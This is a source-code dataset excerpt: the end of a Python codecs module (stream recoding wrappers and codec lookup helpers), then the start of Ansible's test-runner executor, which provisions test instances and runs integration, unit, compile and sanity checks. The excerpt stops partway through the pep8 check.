    def __init__(self, stream, Reader, Writer, errors='strict'):
        self.stream = stream
        self.reader = Reader(stream, errors)
        self.writer = Writer(stream, errors)
        self.errors = errors

    def read(self, size=-1):
        return self.reader.read(size)

    def readline(self, size=None):
        return self.reader.readline(size)

    def readlines(self, sizehint=None):
        return self.reader.readlines(sizehint)

    def __next__(self):
        """Return the next decoded line from the input stream."""
        return next(self.reader)

    def __iter__(self):
        return self

    def write(self, data):
        return self.writer.write(data)

    def writelines(self, list):
        return self.writer.writelines(list)

    def reset(self):
        self.reader.reset()
        self.writer.reset()

    def seek(self, offset, whence=0):
        self.stream.seek(offset, whence)
        self.reader.reset()
        # Only a rewind to the very start also resets the writer.
        if whence == 0 and offset == 0:
            self.writer.reset()

    def __getattr__(self, name,
                    getattr=getattr):
        """Delegate all other attribute lookups to the underlying stream."""
        return getattr(self.stream, name)

    # Needed so that "with codecs.open(...)" works properly.
    def __enter__(self):
        return self

    def __exit__(self, type, value, tb):
        self.stream.close()
###
class StreamRecoder:
    """ StreamRecoder instances provide a frontend - backend
        view of encoding data.

        Data written to the stream is first decoded into an
        intermediate format (which is dependent on the given codec
        combination) and then written to the stream using an instance
        of the provided Writer class.

        In the other direction, data is read from the stream using a
        Reader instance and then returned to the caller re-encoded
        with the frontend encoder.
    """
    # Optional attributes set by the file wrappers below (see EncodedFile()).
    data_encoding = 'unknown'
    file_encoding = 'unknown'

    def __init__(self, stream, encode, decode, Reader, Writer,
                 errors='strict'):
        """ Creates a StreamRecoder instance which implements a two-way
            conversion: encode and decode work on the frontend (the
            input to .read() and output of .write()) while
            Reader and Writer work on the backend (reading and
            writing to the stream).

            You can use these objects to do transparent
            recodings from e.g. latin-1 to utf-8 and back.

            stream must be a file-like object.

            encode and decode must adhere to the Codec interface; Reader
            and Writer must be factory functions or classes providing the
            StreamReader and StreamWriter interfaces resp.  Unicode is
            used as the intermediate encoding.

            Error handling is done in the same way as defined for the
            StreamWriter/Readers.
        """
        self.stream = stream
        self.encode = encode
        self.decode = decode
        self.reader = Reader(stream, errors)
        self.writer = Writer(stream, errors)
        self.errors = errors

    def read(self, size=-1):
        data = self.reader.read(size)
        data, bytesencoded = self.encode(data, self.errors)
        return data

    def readline(self, size=None):
        if size is None:
            data = self.reader.readline()
        else:
            data = self.reader.readline(size)
        data, bytesencoded = self.encode(data, self.errors)
        return data

    def readlines(self, sizehint=None):
        # sizehint is ignored: the whole stream is read and re-encoded.
        data = self.reader.read()
        data, bytesencoded = self.encode(data, self.errors)
        return data.splitlines(keepends=True)

    def __next__(self):
        """ Return the next re-encoded line from the input stream."""
        data = next(self.reader)
        data, bytesencoded = self.encode(data, self.errors)
        return data

    def __iter__(self):
        return self

    def write(self, data):
        data, bytesdecoded = self.decode(data, self.errors)
        return self.writer.write(data)

    def writelines(self, list):
        # Fix: the frontend decoder consumes bytes, so the chunks must be
        # joined with b'' -- the former ''.join() raised TypeError for the
        # bytes input that .decode() requires (this matches upstream CPython).
        data = b''.join(list)
        data, bytesdecoded = self.decode(data, self.errors)
        return self.writer.write(data)

    def reset(self):
        self.reader.reset()
        self.writer.reset()

    def __getattr__(self, name,
                    getattr=getattr):
        """ Inherit all other methods from the underlying stream.
        """
        return getattr(self.stream, name)

    def __enter__(self):
        return self

    def __exit__(self, type, value, tb):
        self.stream.close()
### Shortcuts
def open(filename, mode='rb', encoding=None, errors='strict', buffering=1):
    """ Open an encoded file using the given mode and return
        a wrapped version providing transparent encoding/decoding.

        Note: The wrapped version will only accept the object format
        defined by the codecs, i.e. Unicode objects for most builtin
        codecs. Output is also codec dependent and will usually be
        Unicode as well.

        Files are always opened in binary mode, even if no binary mode
        was specified. This is done to avoid data loss due to encodings
        using 8-bit values. The default file mode is 'rb' meaning to
        open the file in binary read mode.

        encoding specifies the encoding which is to be used for the
        file.

        errors may be given to define the error handling. It defaults
        to 'strict' which causes ValueErrors to be raised in case an
        encoding error occurs.

        buffering has the same meaning as for the builtin open() API.
        It defaults to line buffered.

        The returned wrapped file object provides an extra attribute
        .encoding which allows querying the used encoding. This
        attribute is only available if an encoding was specified as
        parameter.
    """
    if encoding is not None and \
       'b' not in mode:
        # Force opening of the file in binary mode
        mode = mode + 'b'
    file = builtins.open(filename, mode, buffering)
    if encoding is None:
        return file
    try:
        info = lookup(encoding)
        srw = StreamReaderWriter(file, info.streamreader, info.streamwriter, errors)
        # Add attributes to simplify introspection
        srw.encoding = encoding
        return srw
    except Exception:
        # Fix: don't leak the open file descriptor when the codec lookup (or
        # the stream-wrapper construction) fails, e.g. for an unknown encoding.
        file.close()
        raise
def EncodedFile(file, data_encoding, file_encoding=None, errors='strict'):
    """Return a wrapped version of ``file`` that transparently translates
    between two encodings.

    Data written to the wrapper is interpreted according to data_encoding,
    re-encoded to file_encoding and written to the original file; data read
    from the file is translated the other way round.  The intermediate
    representation is usually Unicode (it depends on the codecs involved).

    file_encoding defaults to data_encoding.  errors selects the error
    handling and defaults to 'strict' (raise ValueError on codec errors).

    The wrapper exposes .data_encoding and .file_encoding attributes
    reflecting the parameters of the same name, for introspection.
    """
    if file_encoding is None:
        file_encoding = data_encoding
    frontend = lookup(data_encoding)
    backend = lookup(file_encoding)
    recoder = StreamRecoder(file, frontend.encode, frontend.decode,
                            backend.streamreader, backend.streamwriter,
                            errors)
    # Expose the chosen encodings for introspection.
    recoder.data_encoding = data_encoding
    recoder.file_encoding = file_encoding
    return recoder
### Helpers for codec lookup
def getencoder(encoding):
    """Return the encoder function for the given encoding.

    Raises LookupError if the encoding cannot be found.
    """
    codec = lookup(encoding)
    return codec.encode
def getdecoder(encoding):
    """Return the decoder function for the given encoding.

    Raises LookupError if the encoding cannot be found.
    """
    codec = lookup(encoding)
    return codec.decode
def getincrementalencoder(encoding):
    """Return the IncrementalEncoder class or factory for the given encoding.

    Raises LookupError if the encoding cannot be found or the codec does not
    provide an incremental encoder.
    """
    codec = lookup(encoding)
    if codec.incrementalencoder is None:
        raise LookupError(encoding)
    return codec.incrementalencoder
def getincrementaldecoder(encoding):
    """Return the IncrementalDecoder class or factory for the given encoding.

    Raises LookupError if the encoding cannot be found or the codec does not
    provide an incremental decoder.
    """
    codec = lookup(encoding)
    if codec.incrementaldecoder is None:
        raise LookupError(encoding)
    return codec.incrementaldecoder
def getreader(encoding):
    """Return the StreamReader class or factory function for *encoding*.

    Raises a LookupError in case the encoding cannot be found.
    """
    codec_info = lookup(encoding)
    return codec_info.streamreader
def getwriter(encoding):
    """Return the StreamWriter class or factory function for *encoding*.

    Raises a LookupError in case the encoding cannot be found.
    """
    codec_info = lookup(encoding)
    return codec_info.streamwriter
def iterencode(iterator, encoding, errors='strict', **kwargs):
    """Encoding iterator: lazily encode the strings produced by *iterator*.

    Encodes using an IncrementalEncoder for *encoding*; errors and kwargs
    are passed through to the IncrementalEncoder constructor.
    """
    encoder = getincrementalencoder(encoding)(errors, **kwargs)
    for chunk in iterator:
        encoded = encoder.encode(chunk)
        if encoded:
            yield encoded
    # Flush any state still buffered inside the incremental encoder.
    final = encoder.encode("", True)
    if final:
        yield final
def iterdecode(iterator, encoding, errors='strict', **kwargs):
    """Decoding iterator: lazily decode the byte strings produced by *iterator*.

    Decodes using an IncrementalDecoder for *encoding*; errors and kwargs
    are passed through to the IncrementalDecoder constructor.
    """
    decoder = getincrementaldecoder(encoding)(errors, **kwargs)
    for chunk in iterator:
        decoded = decoder.decode(chunk)
        if decoded:
            yield decoded
    # Flush any partial multi-byte sequence still held by the decoder.
    final = decoder.decode(b"", True)
    if final:
        yield final
### Helpers for charmap-based codecs
def make_identity_dict(rng):
    """make_identity_dict(rng) -> dict

    Return a dictionary mapping each element of the *rng* sequence
    to itself.
    """
    return dict((element, element) for element in rng)
def make_encoding_map(decoding_map):
    """Create an encoding map by inverting *decoding_map*.

    If a target value occurs more than once in the decoding map, it is
    mapped to None (undefined mapping), which makes the charmap codec
    raise an exception when it encounters that character during
    translation. One example where this happens is cp875.py which decodes
    multiple character to \\u001a.
    """
    encoding_map = {}
    for key, value in decoding_map.items():
        if value not in encoding_map:
            encoding_map[value] = key
        else:
            # Ambiguous target: mark as undefined so encoding fails loudly.
            encoding_map[value] = None
    return encoding_map
### error handlers
try:
    # Pre-resolve the standard error handlers so they are available as
    # module attributes (e.g. codecs.strict_errors) without a lookup.
    strict_errors = lookup_error("strict")
    ignore_errors = lookup_error("ignore")
    replace_errors = lookup_error("replace")
    xmlcharrefreplace_errors = lookup_error("xmlcharrefreplace")
    backslashreplace_errors = lookup_error("backslashreplace")
except LookupError:
    # In --disable-unicode builds, these error handler are missing
    strict_errors = None
    ignore_errors = None
    replace_errors = None
    xmlcharrefreplace_errors = None
    backslashreplace_errors = None
# Tell modulefinder that using codecs probably needs the encodings
# package
_false = 0
if _false:
    # Never executed; the import statement exists only so static
    # dependency scanners (modulefinder/freeze tools) pick it up.
    import encodings
### Tests

if __name__ == '__main__':

    # Smoke test: recode the standard streams through EncodedFile.
    # Make stdout translate Latin-1 output into UTF-8 output
    sys.stdout = EncodedFile(sys.stdout, 'latin-1', 'utf-8')

    # Have stdin translate Latin-1 input into UTF-8 input
    sys.stdin = EncodedFile(sys.stdin, 'utf-8', 'latin-1')
| mit |
jcftang/ansible | test/runner/lib/executor.py | 7 | 43544 | """Execute Ansible tests."""
from __future__ import absolute_import, print_function
import glob
import os
import tempfile
import time
import textwrap
import functools
import shutil
import stat
import random
import pipes
import string
import atexit
import re
import lib.pytar
import lib.thread
from lib.core_ci import (
AnsibleCoreCI,
SshKey,
)
from lib.manage_ci import (
ManageWindowsCI,
ManageNetworkCI,
)
from lib.util import (
CommonConfig,
EnvironmentConfig,
ApplicationWarning,
ApplicationError,
SubprocessError,
display,
run_command,
deepest_path,
common_environment,
remove_tree,
make_dirs,
is_shippable,
)
from lib.ansible_util import (
ansible_environment,
)
from lib.target import (
IntegrationTarget,
walk_external_targets,
walk_internal_targets,
walk_posix_integration_targets,
walk_network_integration_targets,
walk_windows_integration_targets,
walk_units_targets,
walk_compile_targets,
walk_sanity_targets,
)
from lib.changes import (
ShippableChanges,
LocalChanges,
)
from lib.git import (
Git,
)
from lib.classification import (
categorize_changes,
)
# Python versions that unit/sanity tests are run against.
SUPPORTED_PYTHON_VERSIONS = (
    '2.6',
    '2.7',
    '3.5',
    '3.6',
)

# Compile checks additionally cover python 2.4 for legacy module syntax compatibility.
COMPILE_PYTHON_VERSIONS = tuple(sorted(SUPPORTED_PYTHON_VERSIONS + ('2.4',)))

# Temporary directory holding the coverage injector; populated lazily by get_coverage_path().
coverage_path = ''  # pylint: disable=locally-disabled, invalid-name
def check_startup():
    """Perform environment checks which must pass before any command runs."""
    check_legacy_modules()
def check_legacy_modules():
    """Detect conflicts with legacy core/extras module directories to avoid problems later."""
    for legacy_dir in ('core', 'extras'):
        legacy_path = 'lib/ansible/modules/%s' % legacy_dir

        for root, _, files in os.walk(legacy_path):
            if not files:
                continue

            # the directory shouldn't exist, but if it does, it must contain no files
            raise ApplicationError('Files prohibited in "%s". '
                                   'These are most likely legacy modules from version 2.2 or earlier.' % root)
def create_shell_command(command):
    """Wrap *command* in /usr/bin/env, forwarding selected environment variables.

    :type command: list[str]
    :rtype: list[str]
    """
    # Environment variables passed through to the spawned shell when present.
    passthrough_vars = (
        'TERM',
    )

    env_args = ['%s=%s' % (name, os.environ[name]) for name in passthrough_vars if name in os.environ]

    return ['/usr/bin/env'] + env_args + list(command)
def install_command_requirements(args):
    """Install the pip requirements for the active test command, if any.

    :type args: EnvironmentConfig
    """
    generate_egg_info(args)

    if not args.requirements:
        return

    cmd = generate_pip_install(args.command)

    if not cmd:
        # no requirements file exists for this command
        return

    if isinstance(args, TestConfig):
        if args.coverage:
            cmd += ['coverage']

    try:
        run_command(args, cmd)
    except SubprocessError as ex:
        if ex.status != 2:
            raise

        # If pip is too old it won't understand the arguments we passed in, so we'll need to upgrade it.

        # Installing "coverage" on ubuntu 16.04 fails with the error:
        # AttributeError: 'Requirement' object has no attribute 'project_name'
        # See: https://bugs.launchpad.net/ubuntu/xenial/+source/python-pip/+bug/1626258
        # Upgrading pip works around the issue.
        run_command(args, ['pip', 'install', '--upgrade', 'pip'])

        # retry the original install with the upgraded pip
        run_command(args, cmd)
def generate_egg_info(args):
    """Generate the ansible egg-info if it does not already exist.

    :type args: EnvironmentConfig
    """
    egg_info_dir = 'lib/ansible.egg-info'

    if not os.path.isdir(egg_info_dir):
        run_command(args, ['python', 'setup.py', 'egg_info'], capture=args.verbosity < 3)
def generate_pip_install(command):
    """Build the pip command line installing the requirements for *command*.

    :type command: str
    :return: list[str] | None
    """
    constraints = 'test/runner/requirements/constraints.txt'
    requirements = 'test/runner/requirements/%s.txt' % command

    # A missing or empty requirements file means nothing to install.
    if not os.path.exists(requirements) or not os.path.getsize(requirements):
        return None

    return ['pip', 'install', '--disable-pip-version-check', '-r', requirements, '-c', constraints]
def command_shell(args):
    """Open an interactive shell in the configured test environment.

    :type args: ShellConfig
    """
    if args.delegate:
        raise Delegate()

    install_command_requirements(args)

    shell_cmd = create_shell_command(['bash', '-i'])
    run_command(args, shell_cmd)
def command_posix_integration(args):
    """Run POSIX integration tests for the selected targets.

    :type args: PosixIntegrationConfig
    """
    matched_targets = command_integration_filter(args, walk_posix_integration_targets())
    command_integration_filtered(args, matched_targets)
def command_network_integration(args):
    """Run network integration tests, provisioning remote platform instances when requested.

    :type args: NetworkIntegrationConfig
    """
    internal_targets = command_integration_filter(args, walk_network_integration_targets())
    # aliases like "network/<platform>/" indicate which platforms the selected tests cover
    platform_targets = set(a for t in internal_targets for a in t.aliases if a.startswith('network/'))

    if args.platform:
        instances = []  # type: list [lib.thread.WrappedThread]

        # generate an ssh key (if needed) up front once, instead of for each instance
        SshKey(args)

        for platform_version in args.platform:
            platform, version = platform_version.split('/', 1)
            platform_target = 'network/%s/' % platform

            if platform_target not in platform_targets and 'network/basics/' not in platform_targets:
                # nothing selected targets this platform, so don't provision an instance for it
                display.warning('Skipping "%s" because selected tests do not target the "%s" platform.' % (
                    platform_version, platform))
                continue

            # provision each platform instance on its own thread so they start in parallel
            instance = lib.thread.WrappedThread(functools.partial(network_run, args, platform, version))
            instance.daemon = True
            instance.start()
            instances.append(instance)

        install_command_requirements(args)

        while any(instance.is_alive() for instance in instances):
            time.sleep(1)

        remotes = [instance.wait_for_result() for instance in instances]
        inventory = network_inventory(remotes)

        filename = 'test/integration/inventory.networking'

        display.info('>>> Inventory: %s\n%s' % (filename, inventory.strip()), verbosity=3)

        if not args.explain:
            with open(filename, 'w') as inventory_fd:
                inventory_fd.write(inventory)
    else:
        install_command_requirements(args)

    command_integration_filtered(args, internal_targets)
def network_run(args, platform, version):
    """Provision a remote network instance for platform/version and wait until it is usable.

    :type args: NetworkIntegrationConfig
    :type platform: str
    :type version: str
    :rtype: AnsibleCoreCI
    """
    instance = AnsibleCoreCI(args, platform, version, stage=args.remote_stage)
    instance.start()
    instance.wait()

    # Block until the instance responds to management access.
    ManageNetworkCI(instance).wait()

    return instance
def network_inventory(remotes):
    """Build an ansible inventory string grouping the given network remotes by platform.

    :type remotes: list[AnsibleCoreCI]
    :rtype: str
    """
    # One (initially empty) host list per platform.
    groups = dict((remote.platform, []) for remote in remotes)

    for remote in remotes:
        options = dict(
            ansible_host=remote.connection.hostname,
            ansible_user=remote.connection.username,
            ansible_connection='network_cli',
            ansible_ssh_private_key_file=remote.ssh_key.key,
            ansible_network_os=remote.platform,
        )

        host_vars = ' '.join('%s="%s"' % (key, options[key]) for key in sorted(options))
        host_name = remote.name.replace('.', '_')

        groups[remote.platform].append('%s %s' % (host_name, host_vars))

    sections = []

    for group in groups:
        entries = '\n'.join(groups[group])

        sections.append(textwrap.dedent("""
        [%s]
        %s
        """) % (group, entries))

    return ''.join(sections)
def command_windows_integration(args):
    """Run Windows integration tests, provisioning remote Windows instances when requested.

    :type args: WindowsIntegrationConfig
    """
    internal_targets = command_integration_filter(args, walk_windows_integration_targets())

    if args.windows:
        instances = []  # type: list [lib.thread.WrappedThread]

        # provision each Windows version on its own thread so they start in parallel
        for version in args.windows:
            instance = lib.thread.WrappedThread(functools.partial(windows_run, args, version))
            instance.daemon = True
            instance.start()
            instances.append(instance)

        install_command_requirements(args)

        while any(instance.is_alive() for instance in instances):
            time.sleep(1)

        remotes = [instance.wait_for_result() for instance in instances]
        inventory = windows_inventory(remotes)

        filename = 'test/integration/inventory.winrm'

        display.info('>>> Inventory: %s\n%s' % (filename, inventory.strip()), verbosity=3)

        if not args.explain:
            with open(filename, 'w') as inventory_fd:
                inventory_fd.write(inventory)
    else:
        install_command_requirements(args)

    try:
        command_integration_filtered(args, internal_targets)
    finally:
        pass
def windows_run(args, version):
    """Provision a remote Windows instance for *version* and wait until it is usable.

    :type args: WindowsIntegrationConfig
    :type version: str
    :rtype: AnsibleCoreCI
    """
    instance = AnsibleCoreCI(args, 'windows', version, stage=args.remote_stage)
    instance.start()
    instance.wait()

    # Block until the instance responds to management access.
    ManageWindowsCI(instance).wait()

    return instance
def windows_inventory(remotes):
    """Build an ansible winrm inventory string for the given Windows remotes.

    :type remotes: list[AnsibleCoreCI]
    :rtype: str
    """
    hosts = []

    for remote in remotes:
        options = dict(
            ansible_host=remote.connection.hostname,
            ansible_user=remote.connection.username,
            ansible_password=remote.connection.password,
            ansible_port=remote.connection.port,
        )

        hosts.append(
            '%s %s' % (
                remote.name.replace('/', '_'),
                ' '.join('%s="%s"' % (k, options[k]) for k in sorted(options)),
            )
        )

    template = """
    [windows]
    %s

    [windows:vars]
    ansible_connection=winrm
    ansible_winrm_server_cert_validation=ignore

    # support winrm connection tests (temporary solution, does not support testing enable/disable of pipelining)
    [winrm:children]
    windows

    # support winrm binary module tests (temporary solution)
    [testhost_binary_modules:children]
    windows
    """

    template = textwrap.dedent(template)
    inventory = template % ('\n'.join(hosts))

    return inventory
def command_integration_filter(args, targets):
    """Filter integration targets by change detection, include/exclude rules and environment support.

    :type args: IntegrationConfig
    :type targets: collections.Iterable[IntegrationTarget]
    :rtype: tuple[IntegrationTarget]
    """
    targets = tuple(targets)
    changes = get_changes_filter(args)
    require = (args.require or []) + changes
    exclude = (args.exclude or [])

    internal_targets = walk_internal_targets(targets, args.include, exclude, require)
    environment_exclude = get_integration_filter(args, internal_targets)

    if environment_exclude:
        # re-filter after adding the environment-driven exclusions
        exclude += environment_exclude
        internal_targets = walk_internal_targets(targets, args.include, exclude, require)

    if not internal_targets:
        raise AllTargetsSkipped()

    if args.start_at and not any(t.name == args.start_at for t in internal_targets):
        raise ApplicationError('Start at target matches nothing: %s' % args.start_at)

    if args.delegate:
        raise Delegate(require=changes, exclude=exclude)

    install_command_requirements(args)

    return internal_targets
def command_integration_filtered(args, targets):
    """Run the already-filtered integration targets, honoring --start-at and retry-on-error.

    :type args: IntegrationConfig
    :type targets: tuple[IntegrationTarget]
    """
    found = False

    targets_iter = iter(targets)

    test_dir = os.path.expanduser('~/ansible_testing')

    if any('needs/ssh/' in target.aliases for target in targets):
        # some targets require a local SSH service; verify connectivity before starting
        max_tries = 20
        display.info('SSH service required for tests. Checking to make sure we can connect.')
        for i in range(1, max_tries + 1):
            try:
                run_command(args, ['ssh', '-o', 'BatchMode=yes', 'localhost', 'id'], capture=True)
                display.info('SSH service responded.')
                break
            except SubprocessError as ex:
                if i == max_tries:
                    raise ex
                seconds = 3
                display.warning('SSH service not responding. Waiting %d second(s) before checking again.' % seconds)
                time.sleep(seconds)

    start_at_task = args.start_at_task

    for target in targets_iter:
        if args.start_at and not found:
            # skip targets until the --start-at target is reached
            found = target.name == args.start_at

            if not found:
                continue

        tries = 2 if args.retry_on_error else 1
        verbosity = args.verbosity

        try:
            while tries:
                tries -= 1

                if not args.explain:
                    # create a fresh test directory for each test target
                    remove_tree(test_dir)
                    make_dirs(test_dir)

                try:
                    if target.script_path:
                        command_integration_script(args, target)
                    else:
                        command_integration_role(args, target, start_at_task)
                        # --start-at-task only applies to the first role executed
                        start_at_task = None
                    break
                except SubprocessError:
                    if not tries:
                        raise

                    display.warning('Retrying test target "%s" with maximum verbosity.' % target.name)
                    display.verbosity = args.verbosity = 6
        except:
            # tell the user how to resume from this point after fixing the failure
            display.notice('To resume at this test target, use the option: --start-at %s' % target.name)

            next_target = next(targets_iter, None)

            if next_target:
                display.notice('To resume after this test target, use the option: --start-at %s' % next_target.name)

            raise
        finally:
            # restore the verbosity that may have been raised for the retry
            display.verbosity = args.verbosity = verbosity
def integration_environment(args):
    """Return the environment variables used to run integration tests.

    :type args: IntegrationConfig
    :rtype: dict[str, str]
    """
    env = ansible_environment(args)

    # Enable the junit callback so test results are captured as junit XML.
    env.update(dict(
        JUNIT_OUTPUT_DIR=os.path.abspath('test/results/junit'),
        ANSIBLE_CALLBACK_WHITELIST='junit',
    ))

    return env
def command_integration_script(args, target):
    """Run a script-based integration test target.

    :type args: IntegrationConfig
    :type target: IntegrationTarget
    """
    display.info('Running %s integration test script' % target.name)

    cmd = ['./%s' % os.path.basename(target.script_path)]

    if args.verbosity:
        cmd.append('-' + ('v' * args.verbosity))

    intercept_command(args, cmd, env=integration_environment(args), cwd=target.path)
def command_integration_role(args, target, start_at_task):
    """Run a role-based integration test target via a generated throwaway playbook.

    :type args: IntegrationConfig
    :type target: IntegrationTarget
    :type start_at_task: str
    """
    display.info('Running %s integration test role' % target.name)

    vars_file = 'integration_config.yml'

    # choose inventory/hosts/fact-gathering based on the target's platform aliases
    if 'windows/' in target.aliases:
        inventory = 'inventory.winrm'
        hosts = 'windows'
        gather_facts = False
    elif 'network/' in target.aliases:
        inventory = 'inventory.networking'
        hosts = target.name[:target.name.find('_')]
        gather_facts = False
        if hosts == 'net':
            hosts = 'all'
    else:
        inventory = 'inventory'
        hosts = 'testhost'
        gather_facts = True

    playbook = '''
- hosts: %s
  gather_facts: %s
  roles:
    - { role: %s }
    ''' % (hosts, gather_facts, target.name)

    with tempfile.NamedTemporaryFile(dir='test/integration', prefix='%s-' % target.name, suffix='.yml') as pb_fd:
        pb_fd.write(playbook.encode('utf-8'))
        pb_fd.flush()

        filename = os.path.basename(pb_fd.name)

        display.info('>>> Playbook: %s\n%s' % (filename, playbook.strip()), verbosity=3)

        cmd = ['ansible-playbook', filename, '-i', inventory, '-e', '@%s' % vars_file]

        if start_at_task:
            cmd += ['--start-at-task', start_at_task]

        if args.verbosity:
            cmd.append('-' + ('v' * args.verbosity))

        env = integration_environment(args)
        cwd = 'test/integration'

        env['ANSIBLE_ROLES_PATH'] = os.path.abspath('test/integration/targets')

        intercept_command(args, cmd, env=env, cwd=cwd)
def command_units(args):
    """Run unit tests with pytest across the supported python versions.

    :type args: UnitsConfig
    """
    changes = get_changes_filter(args)
    require = (args.require or []) + changes
    include, exclude = walk_external_targets(walk_units_targets(), args.include, args.exclude, require)

    if not include:
        raise AllTargetsSkipped()

    if args.delegate:
        raise Delegate(require=changes)

    install_command_requirements(args)

    version_commands = []

    for version in SUPPORTED_PYTHON_VERSIONS:
        # run all versions unless version given, in which case run only that version
        if args.python and version != args.python:
            continue

        env = ansible_environment(args)

        cmd = [
            'pytest',
            '-r', 'a',
            '--color',
            'yes' if args.color else 'no',
            '--junit-xml',
            'test/results/junit/python%s-units.xml' % version,
        ]

        if args.collect_only:
            cmd.append('--collect-only')

        if args.verbosity:
            cmd.append('-' + ('v' * args.verbosity))

        if exclude:
            cmd += ['--ignore=%s' % target.path for target in exclude]

        cmd += [target.path for target in include]

        version_commands.append((version, cmd, env))

    for version, command, env in version_commands:
        display.info('Unit test with Python %s' % version)

        try:
            intercept_command(args, command, env=env, python_version=version)
        except SubprocessError as ex:
            # pytest exits with status code 5 when all tests are skipped, which isn't an error for our use case
            if ex.status != 5:
                raise
def command_compile(args):
    """Run compileall syntax checks across the supported python versions.

    :type args: CompileConfig
    """
    changes = get_changes_filter(args)
    require = (args.require or []) + changes
    include, exclude = walk_external_targets(walk_compile_targets(), args.include, args.exclude, require)

    if not include:
        raise AllTargetsSkipped()

    if args.delegate:
        raise Delegate(require=changes)

    install_command_requirements(args)

    version_commands = []

    for version in COMPILE_PYTHON_VERSIONS:
        # run all versions unless version given, in which case run only that version
        if args.python and version != args.python:
            continue

        # optional list of regex patterns to exclude from tests
        skip_file = 'test/compile/python%s-skip.txt' % version

        if os.path.exists(skip_file):
            with open(skip_file, 'r') as skip_fd:
                skip_paths = skip_fd.read().splitlines()
        else:
            skip_paths = []

        # augment file exclusions
        skip_paths += [e.path for e in exclude]
        skip_paths.append('/.tox/')

        skip_paths = sorted(skip_paths)

        python = 'python%s' % version
        cmd = [python, '-m', 'compileall', '-fq']

        if skip_paths:
            # compileall takes the exclusions as a single alternation regex
            cmd += ['-x', '|'.join(skip_paths)]

        cmd += [target.path if target.path == '.' else './%s' % target.path for target in include]

        version_commands.append((version, cmd))

    for version, command in version_commands:
        display.info('Compile with Python %s' % version)
        run_command(args, command)
def command_sanity(args):
    """Run the selected sanity tests against the selected targets.

    :type args: SanityConfig
    """
    changes = get_changes_filter(args)
    require = (args.require or []) + changes
    targets = SanityTargets(args.include, args.exclude, require)

    if not targets.include:
        raise AllTargetsSkipped()

    if args.delegate:
        raise Delegate(require=changes)

    install_command_requirements(args)

    tests = SANITY_TESTS

    if args.test:
        tests = [t for t in tests if t.name in args.test]

    if args.skip_test:
        tests = [t for t in tests if t.name not in args.skip_test]

    for test in tests:
        if args.list_tests:
            display.info(test.name)
            continue

        if test.intercept:
            # intercepted tests run once per supported python version
            versions = SUPPORTED_PYTHON_VERSIONS
        else:
            # non-intercepted tests run exactly once (single None entry)
            versions = None,

        for version in versions:
            if args.python and version and version != args.python:
                continue

            display.info('Sanity check using %s%s' % (test.name, ' with Python %s' % version if version else ''))

            if test.intercept:
                test.func(args, targets, python_version=version)
            else:
                test.func(args, targets)
def command_sanity_code_smell(args, _):
    """Run every executable, non-skipped code-smell check script.

    :type args: SanityConfig
    :type _: SanityTargets
    """
    with open('test/sanity/code-smell/skip.txt', 'r') as skip_fd:
        skip_tests = skip_fd.read().splitlines()

    candidates = glob.glob('test/sanity/code-smell/*')

    tests = sorted(path for path in candidates
                   if os.access(path, os.X_OK)
                   and os.path.isfile(path)
                   and os.path.basename(path) not in skip_tests)

    for test in tests:
        display.info('Code smell check using %s' % os.path.basename(test))
        run_command(args, [test])
def command_sanity_validate_modules(args, targets):
    """Run the validate-modules sanity check on the applicable module paths.

    :type args: SanityConfig
    :type targets: SanityTargets
    """
    env = ansible_environment(args)

    paths = [deepest_path(i.path, 'lib/ansible/modules/') for i in targets.include_external]
    paths = sorted(set(p for p in paths if p))

    if not paths:
        display.info('No tests applicable.', verbosity=1)
        return

    cmd = ['test/sanity/validate-modules/validate-modules'] + paths

    with open('test/sanity/validate-modules/skip.txt', 'r') as skip_fd:
        skip_paths = skip_fd.read().splitlines()

    skip_paths += [e.path for e in targets.exclude_external]

    if skip_paths:
        # exclusions are passed as a single anchored alternation regex
        cmd += ['--exclude', '^(%s)' % '|'.join(skip_paths)]

    run_command(args, cmd, env=env)
def command_sanity_shellcheck(args, targets):
    """Run shellcheck over the applicable shell scripts.

    :type args: SanityConfig
    :type targets: SanityTargets
    """
    with open('test/sanity/shellcheck/skip.txt', 'r') as skip_fd:
        skip_paths = set(skip_fd.read().splitlines())

    shell_paths = sorted(target.path for target in targets.include
                         if os.path.splitext(target.path)[1] == '.sh'
                         and target.path not in skip_paths)

    if not shell_paths:
        display.info('No tests applicable.', verbosity=1)
        return

    run_command(args, ['shellcheck'] + shell_paths)
def command_sanity_pep8(args, targets):
    """Run the pep8 style checker, applying a relaxed rule set to legacy files.

    :type args: SanityConfig
    :type targets: SanityTargets
    """
    skip_path = 'test/sanity/pep8/skip.txt'
    legacy_path = 'test/sanity/pep8/legacy-files.txt'

    with open(skip_path, 'r') as skip_fd:
        skip_paths = set(skip_fd.read().splitlines())

    with open(legacy_path, 'r') as legacy_fd:
        legacy_paths = set(legacy_fd.read().splitlines())

    with open('test/sanity/pep8/legacy-ignore.txt', 'r') as ignore_fd:
        legacy_ignore = set(ignore_fd.read().splitlines())

    with open('test/sanity/pep8/current-ignore.txt', 'r') as ignore_fd:
        current_ignore = sorted(ignore_fd.read().splitlines())

    paths = sorted(i.path for i in targets.include if os.path.splitext(i.path)[1] == '.py' and i.path not in skip_paths)

    if not paths:
        display.info('No tests applicable.', verbosity=1)
        return

    cmd = [
        'pep8',
        '--max-line-length', '160',
        '--config', '/dev/null',
        '--ignore', ','.join(sorted(current_ignore)),
    ] + paths

    try:
        stdout, stderr = run_command(args, cmd, capture=True)
        status = 0
    except SubprocessError as ex:
        # pep8 exits non-zero when violations are found; capture its output for parsing
        stdout = ex.stdout
        stderr = ex.stderr
        status = ex.status

    if stderr:
        raise SubprocessError(cmd=cmd, status=status, stderr=stderr)

    # parse pep8's "path:line:column: CODE message" report lines
    pattern = '^(?P<path>[^:]*):(?P<line>[0-9]+):(?P<column>[0-9]+): (?P<code>[A-Z0-9]{4}) (?P<message>.*)$'

    results = [re.search(pattern, line).groupdict() for line in stdout.splitlines()]

    for result in results:
        for key in 'line', 'column':
            result[key] = int(result[key])

    failed_result_paths = set([result['path'] for result in results])
    passed_legacy_paths = set([path for path in paths if path in legacy_paths and path not in failed_result_paths])

    errors = []
    summary = {}

    for path in sorted(passed_legacy_paths):
        # Keep files out of the list which no longer require the relaxed rule set.
        errors.append('PEP 8: %s: Passes current rule set. Remove from legacy list (%s).' % (path, legacy_path))

    for path in sorted(skip_paths):
        if not os.path.exists(path):
            # Keep files out of the list which no longer exist in the repo.
            errors.append('PEP 8: %s: Does not exist. Remove from skip list (%s).' % (path, skip_path))

    for path in sorted(legacy_paths):
        if not os.path.exists(path):
            # Keep files out of the list which no longer exist in the repo.
